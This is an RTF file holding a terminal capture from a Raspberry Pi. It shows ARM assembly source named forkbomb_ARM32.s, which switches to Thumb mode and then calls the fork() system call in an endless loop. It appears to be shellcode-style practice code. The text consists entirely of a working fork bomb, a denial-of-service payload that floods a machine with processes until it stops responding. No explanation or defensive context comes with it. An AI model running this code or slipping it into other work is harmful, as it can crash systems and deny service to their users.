{\rtf1\ansi\ansicpg1252\cocoartf1671\cocoasubrtf600
{\fonttbl\f0\fmodern\fcharset0 Courier;}
{\colortbl;\red255\green255\blue255;\red26\green26\blue26;\red254\green254\blue254;}
{\*\expandedcolortbl;;\cssrgb\c13333\c13333\c13333;\cssrgb\c99608\c99608\c99608;}
\margl1440\margr1440\vieww10800\viewh8400\viewkind0
\deftab720
\pard\pardeftab720\partightenfactor0

\f0\fs20 \cf2 \cb3 \expnd0\expndtw0\kerning0
pi@raspberrypi:~ cat forkbomb_ARM32.s\cb1 \
\cb3 .text\cb1 \
\cb3 .global _start\cb1 \
\
\cb3 _start:\cb1 \
\cb3 .code 32\cb1 \
\cb3 ADD R3, PC, #1//Switching to Thumb mode\cb1 \
\cb3 BX R3\cb1 \
\
\cb3 .code 16\cb1 \
\cb3 _loop:\cb1 \
\cb3 EOR R7, R7\cb1 \
\cb3 MOV R7, #2//Syscall to fork()\cb1 \
\cb3 SVC #1\cb1 \
\cb3 MOV R8, R8 //NOP\cb1 \
\cb3 BL _loop}